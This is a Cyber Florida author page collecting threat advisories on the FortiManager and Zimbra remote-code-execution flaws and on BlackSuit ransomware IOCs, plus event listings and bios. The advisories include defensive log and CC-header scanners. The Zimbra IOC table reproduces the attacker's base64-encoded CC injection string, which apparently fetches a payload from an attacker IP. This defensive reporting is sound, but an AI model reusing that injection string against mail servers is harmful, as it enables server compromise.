Sarina

About Sarina Gandy


Critical Vulnerability in Fortinet FortiManager Under Active Exploitation

I. Targeted Entities

  • Fortinet FortiManager customers
  • Managed Service Providers

II. Introduction

A critical vulnerability has been identified in Fortinet's FortiManager platform, a centralized management solution for Fortinet security products. This vulnerability, tracked as CVE-2024-47575, allows for remote code execution (RCE) by unauthorized attackers. The exploitation of this vulnerability is currently active in the wild, posing a significant threat to affected organizations. If successfully exploited, attackers could gain access to critical systems, install malicious programs, and manipulate sensitive data. Fortinet and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have issued advisories urging organizations to take immediate action by applying the latest patches to mitigate risks.

FortiManager is widely deployed across sectors, including government, telecommunications, financial services, and healthcare, making this vulnerability particularly concerning. Given the increasing sophistication of cyberattacks, unpatched systems present a high risk, allowing attackers to potentially escalate privileges and compromise network infrastructures.

III. Additional Background Information

In October 2024, a critical vulnerability was discovered in Fortinet's FortiManager, a network management solution widely used to centrally configure and monitor Fortinet devices. This vulnerability, tracked as CVE-2024-47575, stems from a missing authentication check in the fgfmd daemon and allows attackers to execute arbitrary code remotely without valid credentials. Fortinet and CISA have confirmed that malicious actors are actively targeting both on-premises and cloud-based instances of FortiManager through specially crafted requests, leveraging this flaw to compromise network environments.

The exploit is aligned with tactics defined in the MITRE ATT&CK framework, specifically T1190 – Exploit Public-Facing Application, indicating that adversaries are using exposed FortiManager instances as initial access points. Once inside, attackers can install backdoors, modify security configurations, and delete or manipulate data, depending on the privileges of the compromised service accounts. Higher-privileged accounts allow attackers to escalate their control, leading to significant disruptions.

Previous incidents involving vulnerabilities in network appliances highlight the severity of such attacks. FortiManager's broad adoption across multiple critical infrastructures and industries makes it an attractive target. Unpatched instances are especially vulnerable to this exploit. Additionally, this vulnerability exposes connected Fortinet devices, allowing attackers to disable firewalls or VPNs and undermine network defenses.

Organizations are strongly advised to apply the latest patches immediately, perform vulnerability assessments, and monitor for indicators of compromise (IoC). Fortinet has released mitigation guidelines, emphasizing the importance of updating software, segmenting networks, and limiting administrative access to prevent further exploitation. Failure to act could result in severe operational disruptions and data breaches, particularly for critical infrastructure providers and enterprises that rely heavily on Fortinet's security infrastructure.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    Attackers exploit the public-facing FortiManager application via a missing authentication flaw. This vulnerability allows unauthorized attackers to execute arbitrary code on FortiManager by sending specially crafted requests, gaining initial access to the system and enabling control over FortiGate devices connected to the network.
  • T1078 – Valid Accounts
    The threat actors leverage valid certificates on unauthorized FortiManager and FortiGate devices, allowing them to register these devices on exposed FortiManager instances. By mimicking legitimate access, the attackers avoid raising immediate security alerts and maintain a low profile for further exploitation and lateral movement within the network.
  • T1036 – Masquerading
    Attackers register rogue FortiManager devices under misleading names (e.g., "localhost") and legitimate-seeming serial numbers (e.g., FMG-VMTM23017412). This technique helps obscure threat actor activity within FortiManager logs and console, allowing the attacker's device to appear as if it is part of the legitimate infrastructure.
  • T1041 – Exfiltration Over C2 Channel
    Exfiltration of FortiManager and FortiGate configuration files occurs over encrypted Command and Control (C2) channels, leveraging HTTPS to avoid detection by security tools. The threat actor UNC5820 has been observed using specific IP addresses to exfiltrate compressed files containing sensitive configuration information, user credentials, and device data.
  • T1587.003 – Develop Capabilities: Digital Certificates
    Attackers leverage valid digital certificates on FortiManager and FortiGate devices to masquerade malicious activities as legitimate. With these certificates, unauthorized devices can connect to FortiManager, bypassing certain security configurations and enabling persistent access to compromised networks.
  • T1562.001 – Impair Defenses: Disable or Modify Tools
    Attackers modify FortiManager configuration to evade detection. By using commands such as fgfm-deny-unknown, attackers can prevent detection of unauthorized devices. This adjustment allows attackers to sustain their unauthorized access, mitigating the chances of detection during ongoing operations.
  • T1027 – Obfuscated Files or Information
    Attackers use gzip compression on the /tmp/.tm archive, which stores exfiltrated configuration data, to obfuscate and minimize visibility of extracted data. This technique reduces the file's detection footprint, making it harder to identify during data exfiltration stages.
  • T1040 – Network Sniffing
    While not directly observed in this incident, the configuration data exfiltrated includes sensitive details like IPs and credentials. This could indicate an intention to use network sniffing techniques or other credential-monitoring tactics to further penetrate or maintain persistence in the target network.

V. Immediate Recommendations

  • Install Security Updates:
    • Fortinet has released fixes for CVE-2024-47575. To address the flaw and reduce the risk of active exploitation, organizations should prioritize installing these updates on all FortiManager instances, both on-premises and cloud-based.
  • Monitor for Compromise Indicators (IoCs):
    • Regularly check network traffic and system logs for the known IoCs linked to this attack, such as file paths, flagged IP addresses, MD5 hash values, and log entries that may point to exploitation (see the IOCs section below). Incorporate these IoCs into your SIEM or IDS/IPS to improve detection.
  • Establish an Incident Response Plan:
    • Create or revise an incident response plan that includes steps for handling FortiManager vulnerability exploitation. Make sure your response team is equipped and trained to deal with any possible Fortinet system breaches.
  • Isolate Compromised Systems:
    • If any indications of compromise are found, isolate the affected systems immediately to stop further access or harm. Notify the affected parties and carry out a comprehensive investigation, eliminating any malware or backdoors.

VI. IOCs (Indicators of Compromise)

Type | Indicator
IP | 45.32.41[.]202
IP | 195.85.114[.]78
IP | 104.238.141[.]143
IP | 158.247.199[.]37
IP | 45.32.63[.]2
File | /tmp/.tm
File | /var/tmp/.tm
MD5 hash of unreg_devices.txt | 9DCFAB171580B52DEAE8703157012674
Email address | 0qsc137p[@]justdefinition.com
Log entry | type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,…",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" changes="Unregistered device localhost add succeeded"
Log entry | type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"
String revealing exploitation activity in /log/locallog/elog | msg="Unregistered device localhost add succeeded"
String revealing exploitation activity in /log/locallog/elog | changes="Edited device settings (SN FMG-VMTM23017412)"
String revealing exploitation activity in /log/locallog/elog | changes="Added unregistered device to unregistered table.
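The log-entry and string IOCs in the table above can be turned into a routine check over FortiManager's local event log. The following is an added example, not code from the advisory or from Fortinet; it assumes the key=value layout of the elog lines shown in the table, and its sample lines are constructed from those entries (with the truncated user field replaced by a placeholder) plus one benign line.

```python
"""Flag FortiManager local event-log (elog) lines that match the CVE-2024-47575
indicators in the advisory's IOC table. Added example; not Fortinet code."""
import re
from typing import Dict, List, Tuple

# Strings taken from the IOC table above: the rogue device registers under the
# name "localhost" and is later edited with serial FMG-VMTM23017412.
KNOWN_STRINGS = (
    "Unregistered device localhost add succeeded",
    "Added unregistered device to unregistered table",
)
ROGUE_SERIAL = "FMG-VMTM23017412"

# One key=value field: the value is either double-quoted (and may then contain
# spaces and commas) or a bare token ended by whitespace or a comma.
_FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]*))')


def parse_elog_line(line: str) -> Dict[str, str]:
    """Split one elog line into its key=value fields (quotes removed)."""
    fields: Dict[str, str] = {}
    for m in _FIELD_RE.finditer(line):
        key, quoted, bare = m.groups()
        fields[key] = bare if quoted is None else quoted
    return fields


def classify(fields: Dict[str, str]) -> List[str]:
    """Return the reasons a parsed line looks like rogue-device activity."""
    reasons: List[str] = []
    msg = fields.get("msg", "")
    changes = fields.get("changes", "")
    for text in KNOWN_STRINGS:
        if text in msg or text in changes:
            reasons.append(f"known IOC string: {text!r}")
    if ROGUE_SERIAL in changes:
        reasons.append(f"device edit references rogue serial {ROGUE_SERIAL}")
    if fields.get("operation") == "Add device" and fields.get("performed_on") == "localhost":
        reasons.append("device added under the name 'localhost'")
    return reasons


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (1-based line number, reasons) for every line that matched."""
    hits: List[Tuple[int, List[str]]] = []
    for number, line in enumerate(lines, start=1):
        reasons = classify(parse_elog_line(line))
        if reasons:
            hits.append((number, reasons))
    return hits


# Constructed sample: the two log entries from the IOC table (straight quotes,
# the truncated user field filled with a placeholder) and one benign line.
SAMPLE_LINES = [
    'type=event,subtype=dvm,pri=information,desc="Device manager generic information log",'
    'user="device_manager_placeholder",msg="Unregistered device localhost add succeeded" '
    'device="localhost" adom="FortiManager" session_id=0 operation="Add device" '
    'performed_on="localhost" changes="Unregistered device localhost add succeeded"',
    'type=event,subtype=dvm,pri=notice,desc="Device Manager dvm log at notice level",'
    'user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" '
    'performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"',
    'type=event,subtype=dvm,pri=information,desc="Device manager generic information log",'
    'user="admin",msg="Install config succeeded" adom="root" session_id=17 '
    'operation="Install config" performed_on="FGT-branch-placeholder" '
    'changes="Policy package installed"',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LINES):
        print(f"line {number}: " + "; ".join(reasons))
```

Feed it the contents of /log/locallog/elog (or the same lines forwarded to a SIEM); a hit on the serial or the "localhost" add is worth an immediate look even when the message strings differ slightly between firmware builds.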

VII. References

The Channel Co., CRN (October 24, 2024). 5 Things To Know On The Fortinet FortiManager Attacks. https://www.crn.com/news/security/2024/5-things-to-know-on-the-fortinet-fortimanager-attacks

Bleeping Computer (October 23, 2024). Fortinet warns of new critical FortiManager flaw used in zero-day attacks. https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/

Google Cloud (October 23, 2024). Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575). https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575

New York State (October 23, 2024). A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution. https://its.ny.gov/2024-120

Bleeping Computer (October 24, 2024). Mandiant says new Fortinet flaw has been exploited since June. https://www.bleepingcomputer.com/news/security/mandiant-says-new-fortinet-fortimanager-flaw-has-been-exploited-since-june/

CVE (October 23, 2024). CVE-2024-47575. https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2024-47575

FortiGuard (October 17, 2024). Missing authentication in fgfmsd. https://www.fortiguard.com/psirt/FG-IR-24-423

MS-ISAC (October 23, 2024). A Vulnerability in Fortinet FortiManager Could Allow for Remote Code Execution. https://learn.cisecurity.org/webmail/799323/2307481671/eb748002d95238b2d31f1dc45b527f271478b2fb5b4d5ee93eb20f05d2825fce

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Uday Bilakhiya, Thiago Pagliaroni, and Kayla Walker. 

Published 2024-11-12T12:00:23-05:00

Zimbra Collaboration RCE Vulnerability

I. Targeted Entities

  • Small to Medium Government and Business Entities

II. Introduction

A critical remote code execution (RCE) vulnerability, tracked as CVE-2024-45519, has been discovered in Zimbra email servers, posing a significant threat to organizations relying on the platform. The vulnerability resides in Zimbra's postjournal service, which processes incoming emails over SMTP. It allows attackers to compromise servers by sending specially crafted emails whose CC field triggers arbitrary command execution on the server. Once exploited, the vulnerability can be used to install web shells, giving attackers full access to the compromised server and enabling further network infiltration.

III. Additional Background Information

Zimbra Collaboration, a widely used cloud-hosted platform for email and communication services, has become a prime target for cyberattacks due to its prevalence in corporate and government environments. In September 2024, a critical vulnerability, CVE-2024-45519, was uncovered in Zimbra’s postjournal service. This flaw, caused by improper input validation, allows remote attackers to execute arbitrary commands without authentication. The vulnerability has gained increased attention following the release of a proof-of-concept (PoC) exploit, significantly raising the risk of widespread exploitation. Given Zimbra’s importance across various sectors, the exposure of this vulnerability poses a serious threat to affected systems, making it a key concern in the current cybersecurity landscape.

IV. MITRE ATT&CK

  • T1190 – Exploit Public-Facing Application
    • The attackers exploit a vulnerability in the Zimbra Collaboration Suite, a public-facing application, by sending specially crafted emails that trigger command execution on the server.
  • T1505.003 – Server Software Component: Web Shell
    • The attackers create a web shell on the compromised server by concatenating base64-encoded commands from the CC field of the emails, allowing persistent remote access.
  • T1059.004 – Command and Scripting Interpreter: Unix Shell
    • The attackers execute shell commands on the server by exploiting the input validation flaw, enabling them to control the system via the web shell.
  • T1071.001 – Application Layer Protocol: Web Protocols
    • The attackers use HTTP requests with specially crafted cookies (JSESSIONID and JACTION) to communicate with the web shell, establishing a command-and-control channel.
  • T1105 – Ingress Tool Transfer
    • Through the web shell, the attackers download and execute additional malicious code or files onto the compromised server.
  • T1132.001 – Data Encoding: Standard Encoding
    • The attackers use base64 encoding to encode malicious commands and payloads within the email CC fields and cookies to obfuscate the data and evade detection.
  • T1036.005 – Masquerading: Match Legitimate Name or Location
    • The attackers send spoofed emails that appear to come from Gmail, leveraging trusted sources to bypass initial security checks.

V. Recommendations

  • Patch Management
    • Ensure that all Zimbra email server installations, including Zimbra 9.0.0 Patch-41, Zimbra 10.0.9, and Zimbra 10.1.1 (Daffodil), are updated with the latest patches addressing CVE-2024-45519. Systems still running Zimbra 8.8.15, which has received a one-time patch past its EOL, should be prioritized for patching. Regularly monitor for new security updates and apply them as soon as they are released.
  • Monitoring and Logging
    • Implement comprehensive monitoring and logging to detect suspicious activities targeting the Zimbra postjournal service. Focus on identifying unusual email patterns, base64-encoded commands, or abnormal execution of commands through the postjournal service. Regular log reviews can help catch early signs of exploitation.
  • Access Control
    • Properly configure Zimbra's "mynetworks" parameter to restrict access to trusted IP ranges only. If the postjournal service is not required for your organization's operations, consider disabling it to reduce the attack surface, especially in environments where patching may be delayed.
  • Service Management
    • Ensure that optional services like postjournal, which is not enabled by default, remain disabled unless explicitly needed. On systems where postjournal is unnecessary, consider removing or disabling it entirely to minimize potential vulnerabilities.
  • Vendor Communication
    • Establish regular communication with Zimbra to stay informed about the latest security advisories, patches, and best practices. Regularly check the Zimbra Security Center and set up notifications to receive updates on new vulnerabilities and security patches promptly.
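The monitoring recommendation above calls for catching base64-encoded commands in the CC field before postjournal acts on them. The following is an added example, not code from the advisory or from Zimbra; it inspects raw CC header text for the markers named in this advisory ($IFS as a whitespace substitute, a pipe into base64, shell quoting) and uses constructed sample headers with a harmless base64 blob standing in for the attacker's payload.

```python
"""Triage raw CC header values for the shell-injection shape described in the
advisory (metacharacters, $IFS, base64 blobs). Added example; not Zimbra code."""
import re
from typing import List, Tuple

# Substrings that have no place in a mailbox address but that a command
# injected through a shell-invoked helper depends on.
SHELL_MARKERS = ("`", "$(", "${", "|", ";", "&&", "'", '"', "\\", "\n")
# $IFS / ${IFS} stands in for whitespace when a space would break the address.
_IFS_RE = re.compile(r"\$\{?IFS\}?")
# A long run of base64 alphabet characters, optionally padded.
_B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def split_recipients(raw_header: str) -> List[str]:
    """Split a raw CC header on commas and keep the bare address from <...>.

    Display names containing commas are split too: this is a triage heuristic
    over raw header text, deliberately not a forgiving RFC 5322 parser.
    """
    recipients: List[str] = []
    for part in raw_header.split(","):
        part = part.strip()
        if not part:
            continue
        angle = re.search(r"<([^>]*)>", part)
        recipients.append(angle.group(1) if angle else part)
    return recipients


def inspect_recipient(addr: str) -> List[str]:
    """Return the reasons one recipient token looks like injected shell text."""
    reasons: List[str] = []
    for marker in SHELL_MARKERS:
        if marker in addr:
            reasons.append(f"shell metacharacter {marker!r}")
    if _IFS_RE.search(addr):
        reasons.append("$IFS used as a whitespace substitute")
    if _B64_RUN_RE.search(addr):
        reasons.append("long base64-looking run")
    if addr.count("@") != 1:
        reasons.append("not exactly one '@'")
    return reasons


def inspect_cc_header(raw_header: str) -> List[Tuple[str, List[str]]]:
    """Return (recipient, reasons) for each recipient that raised a reason."""
    findings: List[Tuple[str, List[str]]] = []
    for addr in split_recipients(raw_header):
        reasons = inspect_recipient(addr)
        if reasons:
            findings.append((addr, reasons))
    return findings


# Constructed samples: an ordinary header, and one carrying the markers from
# the advisory's IOC with a harmless blob ("hello from the test" in base64)
# standing in for the attacker's payload.
BENIGN_CC = "Alice Example <alice@example.com>, bob.smith@example.org"
SUSPECT_CC = "report${IFS}aGVsbG8gZnJvbSB0aGUgdGVzdA==|base64${IFS}-d@mail.com"

if __name__ == "__main__":
    for header in (BENIGN_CC, SUSPECT_CC):
        for addr, reasons in inspect_cc_header(header):
            print(addr, "->", "; ".join(reasons))
```

Run it over the CC values your MTA logs or a milter sees; a legitimate address can trip the base64 heuristic on its own, so treat one reason as a review queue item and several together as an alert.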

VI. IOCs (Indicators of Compromise)

Type | Indicator
IP address | 79.124.49[.]86
Port | 10027
Base64-encoded string | ppp'echo${IFS} Li4vLj4vY29tbW9uL2Jpbi 9jdXJsIGh0dHA6LY830S 4xMjQuNDkuODY6NDQZL 3RwdnRnYmp3ZWV2dnV vbWJ5d2xrdGhsbGpkdXB 4Znlz|base64$(IFS)-di shipppppp@mail.com

VII. References

Dark Reading. (October 1, 2024). Zimbra RCE Vuln Under Attack Needs Immediate Patching. https://www.darkreading.com/cyberattacks-data-breaches/recent-zimbra-rce-under-attack-patch-now

BleepingComputer. (October 2, 2023). Critical Zimbra RCE flaw exploited to backdoor servers using emails. https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-exploited-to-backdoor-servers-using-emails/

SOCRadar. (October 02, 2024). RCE Vulnerability in Zimbra (CVE-2024-45519). https://socradar.io/rce-vulnerability-in-zimbra-cve-2024-45519/

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Reis Pagliaroni, and Benjamin Price.

Published 2024-10-28T11:58:24-04:00

chat:CYBR Podcast Episode 5: Joan Woodward

In this episode of chat:CYBR, James Jacobs and Jordan Deiuliis discuss the role of the Travelers Institute in public policy and cybersecurity with Joan Woodward, the president of the Institute. They explore the evolution of the Institute, the importance of cybersecurity awareness, and the intersection of cybersecurity and insurance. Joan shares insights from recent studies on CFO concerns regarding cybersecurity and emphasizes the need for proactive measures to mitigate risks. The conversation concludes with recommendations for policymakers to enhance cybersecurity strategies.

Published 2025-02-18T12:20:12-05:00

Teaching Cybersecurity in a World of AI and Deep Fakes | Operation K12 Webinar

Join our Operation K12 team to explore Teaching Cybersecurity in a World of AI and Deep Fakes.

In this webinar, the University of Florida’s Dr. Nancy Ruzycki and Cyber Florida’s Operation K12 will explore how cyber teachers can bring in AI frameworks and tools in the cyber classroom.

This session will look at generative AI and deepfakes, and the role of cyber professionals in protecting consumers from misinformation.


Published 2025-01-06T10:12:41-05:00

Mark Clancy

Vice President for Cybersecurity/CISO, Sprint, Inc.; Founder, Cyber Risk Management; former Managing Director for Technology Risk Management/CISO, Depository Trust and Clearing Corporation (DTCC).

Published 2024-09-25T14:41:21-04:00

Lt. Gen. Dennis Crall

CEO of Advance Foundry. DoD Joint Staff, former Chief Information Officer – Director Command, Control, Communications, and Cyber (C4). Former Senior Military Advisor to the Undersecretary of Defense for Policy and former Deputy Principal Cyber Advisory to the Secretary of Defense.

Published 2024-09-25T14:43:26-04:00

Christopher Day

VP Strategic Capabilities and Programs, Tenable. VP of Cognitive Cyber, ManTech, Member Defense Science Board, Chief Information Security Officer for Invincea, CTO for Packet Forensics, LLC and its subsidiaries; Senior Vice President, Secure Information Services for Terremark Worldwide, Inc.; and Vice President for SteelCloud. Co-founded The Asgard Group, and subsequently sold it to SteelCloud in 2004.

Published 2024-09-25T14:42:47-04:00

Terry Roberts

Founder, President and CEO WhiteHawk CEC Inc., TASC VP for Cyber Engineering and Analytics, an Executive Director Carnegie Mellon University – Software Engineering Institute (CMU SEI), Deputy Director of Naval Intelligence CNO OPNAV, Director Requirements and Resources – Office of the Undersecretary of Defense for Intelligence.

Published 2024-10-28T16:21:55-04:00

Cybersecurity Workshop for Florida Critical Infrastructure

Join us on 29 October at the Tampa Palms Country Club for a dynamic cybersecurity workshop tailored to Florida’s critical infrastructure sectors.

This event will provide actionable recommendations for enhancing compliance with Florida Statute 282.318 and feature an overview of Cyber Florida’s no-cost solutions and services to strengthen your organization’s cyber defenses.

Participants will also engage in an exciting tabletop exercise hosted by the National Cybersecurity Preparedness Consortium (NUARI), offering hands-on experience in responding to cyber incidents. A free lunch will be provided, along with opportunities to network with cybersecurity experts and industry peers.

Don’t miss this chance to improve your cybersecurity posture and resilience!

Published 2024-10-04T09:50:48-04:00

Blacksuit Ransomware Updated IOCs

I. Targeted Entities

  • Healthcare sector
  • Education sector
  • Government organizations
  • Manufacturing industries
  • Retail industries

II. Introduction

New Indicators of Compromise associated with BlackSuit ransomware have been found in recent attacks. BlackSuit is a sophisticated cyber threat known for its double extortion tactics, encrypting and exfiltrating victim data to demand ransom.

III. Additional Background Information

BlackSuit ransomware emerged as a prominent threat actor in the cyber landscape in 2023. It is believed to be a direct successor to the Royal ransomware, itself a descendant of the notorious Conti ransomware group. BlackSuit shares significant code similarities with Royal, including encryption algorithms and communication methods, indicating that the operators behind BlackSuit have inherited and improved upon Royal’s techniques. An analysis made by Trend Micro revealed that BlackSuit and Royal ransomware have a high degree of similarity, with 98% similarities in functions, 99.5% similarities in blocks, and 98.9% similarities in jumps. Additionally, BlackSuit employs command-line arguments like those used by Royal, though with some variations and additional arguments.

This technical sophistication has allowed BlackSuit to conduct multiple high-profile attacks across various sectors since its emergence. Notably, one of the most significant attacks targeted a U.S.-based healthcare provider in October 2023, resulting in severe operational disruptions. The financial losses from this attack were estimated to be in the millions, including ransom payments and the cost of recovery and mitigation. In another incident, an educational institution suffered a data breach, leading to the exposure of sensitive student and staff information.

Financial gain is the primary motivation behind BlackSuit attacks. The group employs double extortion tactics, demanding ransom not only to decrypt the data but also to prevent the leaked data from being publicly released. This strategy increases the pressure on victims to pay the ransom, highlighting the ruthlessness and effectiveness of BlackSuit’s extortion methods.

Tools Used
  • BlackSuit ransomware: The main payload used for encrypting victim data.
  • Bravura Optitune: Legitimate remote monitoring and management (RMM) software used for maintaining remote access.
  • InfoStealer: Malware designed to steal sensitive information, including credentials and financial data.
  • NetScan: SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovering host names and network services.
  • Process Explorer: A Microsoft Sysinternals tool that provides detailed information about processes running on a system, used for monitoring and debugging.
  • ProcessHacker: A free tool for monitoring system resources, debugging software, and detecting malware.
  • PsKill: Microsoft Sysinternals command-line tool used to terminate Windows processes on local or remote systems.
  • PsSuspend: Microsoft Sysinternals command-line tool used to suspend processes on a local or remote system.
  • PsExec: A Microsoft Sysinternals tool for executing processes on other systems, primarily used by attackers for lateral movement.
  • Rclone (suspected): An open-source tool that can manage content in the cloud, often abused by ransomware actors to exfiltrate data from victim machines.

These tools allow BlackSuit to conduct reconnaissance, maintain persistence, and execute their ransomware effectively. The group’s preference for leveraging legitimate software tools makes their activities harder to detect and mitigate. Understanding the tools and methods employed by BlackSuit ransomware is critical for defending against their attacks.

IV. MITRE ATT&CK

  • T1057 – Process Discovery
    • BlackSuit ransomware operators use tools like Process Explorer to list and monitor active processes. This allows them to identify security software, such as antivirus or endpoint detection and response (EDR) tools, which they may attempt to disable to avoid detection and ensure the success of their attack.
  • T1059 – Command and Scripting Interpreter
    • BlackSuit ransomware leverages PowerShell scripts to execute commands and payloads on compromised systems. PowerShell is a powerful scripting language built into Windows, which allows for the automation of administrative tasks. By using PowerShell, attackers can download additional payloads, execute them, and carry out further malicious activities without raising immediate suspicion.
  • T1082 – System Information Discovery
    • BlackSuit may run commands to gather information about the system architecture, OS version, installed software, and hardware details. This information helps attackers tailor their payloads and strategies to the specific environment they are targeting, increasing the chances of a successful attack.
  • T1083 – File and Directory Discovery
    • BlackSuit ransomware may use commands or scripts to enumerate user directories, document folders, and network shares. This helps them identify valuable files to encrypt, maximizing the impact of their attack and increasing the likelihood that victims will pay the ransom to regain access to their data.
  • T1204 – User Execution
    • BlackSuit ransomware operators may send phishing emails with malicious attachments or links. These emails are crafted to appear legitimate, often posing as invoices, delivery notifications, or urgent messages that require immediate attention. When the recipient opens the attachment or clicks the link, the ransomware is executed, leading to the infection of their system.
  • T1486 – Data Encrypted for Impact
    • BlackSuit encrypts critical files on the victim’s system using strong encryption algorithms. After encryption, the attackers demand a ransom for the decryption key needed to restore access to the data. This not only disrupts the victim’s operations but also places them under significant pressure to pay the ransom to recover their data.
  • T1490 – Inhibit System Recovery
    • BlackSuit ransomware might delete Volume Shadow Copies on Windows systems. Volume Shadow Copies are backup snapshots created by the operating system that allow users to restore their data to a previous state. By deleting these backups, the attackers ensure that victims cannot easily recover their data without paying the ransom, thereby increasing the effectiveness of their extortion.

V. Recommendations

  • Hash Blacklisting and Detection Updates:
    • Maintain an up-to-date blacklist of known malicious file hashes associated with BlackSuit and other ransomware variants. Use threat intelligence feeds and security vendors’ databases to identify and block these malicious files at the network perimeter and endpoint levels. Ensure that antivirus and anti-malware solutions are set to receive regular updates for detecting new ransomware variants and their associated hashes. Promptly apply these updates to enhance your organization’s capability to detect and prevent ransomware infections.
  • Regular Backup and Disaster Recovery Planning:
    • Maintain regular backups of critical data and systems, and store them securely, preferably off-site or in a cloud environment with strong encryption. Develop and periodically test a comprehensive disaster recovery plan that includes procedures for restoring data and services in a cyberattack.
  • Implement Advanced Threat Intelligence and Information Sharing:
    • Subscribe to and actively monitor threat intelligence feeds for the latest information on vulnerabilities and threats. Participate in industry and government cybersecurity information-sharing programs to stay informed about emerging threats and best practices.
  • Enhance Incident Response and Forensic Capabilities:
    • Develop and maintain a robust incident response plan that includes procedures for containment, eradication, and recovery. Ensure that forensic capabilities are available to investigate and understand the nature and scope of any breach, to improve defenses and prevent future incidents.
  • Manage Default Accounts on Enterprise Assets and Software:
    • Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.

VI. IOCs (Indicators of Compromise)

File name | Description | SHA-256 hash | VirusTotal detections
psexec.exe | PsExec | 078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b | 2
decryptor.exe | BlackSuit ransomware | 141c7c7a2dea1be7304551a1fa0d4e4736e45b079f48eb8ff4c45d6a033b995a | 51
netscan.exe | NetScan | 18f0898d595ec054d13b02915fb7d3636f65b8e53c0c66b3c7ee3b6fc37d3566 | 32
sqlite.dll | Suspected information-stealing malware | 5c297d9d50d0a784f16ac545dd93a889f8f11bf37b29f8f6907220936ab9434f | 38
pskill.exe | PsKill | 5ef168f83b55d2cbd2426afc5e6fa8161270fa6a2a312831332dc472c95dfa42 | 1
rclone.exe | Rclone | d9a8c4fc94655f47a127b45c71e426d0f2057b6faf78fb7b86ee2995f7def41d | 2
ProcessHacker.exe | ProcessHacker | bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 | 29

Network IOC | VirusTotal detections
185.73.125[.]96 | 10

VII. References

Blacksuit (2024) SentinelOne. Available at: https://www.sentinelone.com/anthology/blacksuit/ (Accessed: 08 June 2024).

Montalbano, E. (2024) BlackSuit Claims Dozens of Victims With Ransomware. Available at: https://www.darkreading.com/cyberattacks-data-breaches/blacksuit-dozens-victims-curated-ransomware (Accessed: 08 June 2024).

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Yousef Blassy, Thiago Pagliaroni, Yousef Aref, Abdullah Siddiqi, and Nahyan Jamil.

Published 2024-07-24T13:34:43-04:00